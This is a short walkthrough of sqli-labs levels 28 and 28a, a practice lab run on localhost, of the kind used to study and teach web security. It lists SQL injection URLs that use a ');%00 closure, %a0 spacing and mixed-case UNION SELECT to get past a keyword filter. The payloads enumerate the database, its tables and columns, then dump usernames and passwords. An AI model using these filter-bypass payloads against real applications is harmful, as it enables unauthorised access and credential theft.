sqli-labs (less-28 and less-28a)

sqli-labs (less-28 and less-28a)

less-28

Enter 28 level, enter ID=1 to

view the source code. It

is found that it is basically the same as level 27, still using mixed case to bypass

http://127.0.0.1/sql1/Less-28/?id=1' #回显错误
http://127.0.0.1/sql1/Less-28/?id=1');%00 #正常显示

Judge the closing mode as');%00, and inject the character type to
determine the echo position

http://127.0.0.1/sql1/Less-28/?id=111') %a0 UniON %a0 sElect %a0 1,2,3;%00

View current library

http://127.0.0.1/sql1/Less-28/?id=111') %a0 UniON %a0 sElect %a0 1,2,database();%00

View all tables under the security library

http://127.0.0.1/sql1/Less-28/?id=111') %a0 UniON %a0 sElect %a0 1,2,(select (group_concat(table_name)) from (information_schema.tables) where (table_schema='security'));%00

View all fields under the users table

http://127.0.0.1/sql1/Less-28/?id=111') %a0 UniON %a0 sElect %a0 1,2,(select (group_concat(column_name)) from (information_schema.columns) where (table_name='users'));%00

View the values ​​of username and password fields

http://127.0.0.1/sql1/Less-28/?id=111') %a0 UniON %a0 sElect %a0 1,2,(select (group_concat(username,password)) from (security.users));%00

less-28a

http://127.0.0.1/sql1/Less-28a/?id=1' #回显错误
http://127.0.0.1/sql1/Less-28a/?id=1');%00 #回显正常

Judge the closing method as');%00, and inject the character type.
The following is not specific, it is exactly the same as less-28, this pass also uses mixed case to bypass the waf firewall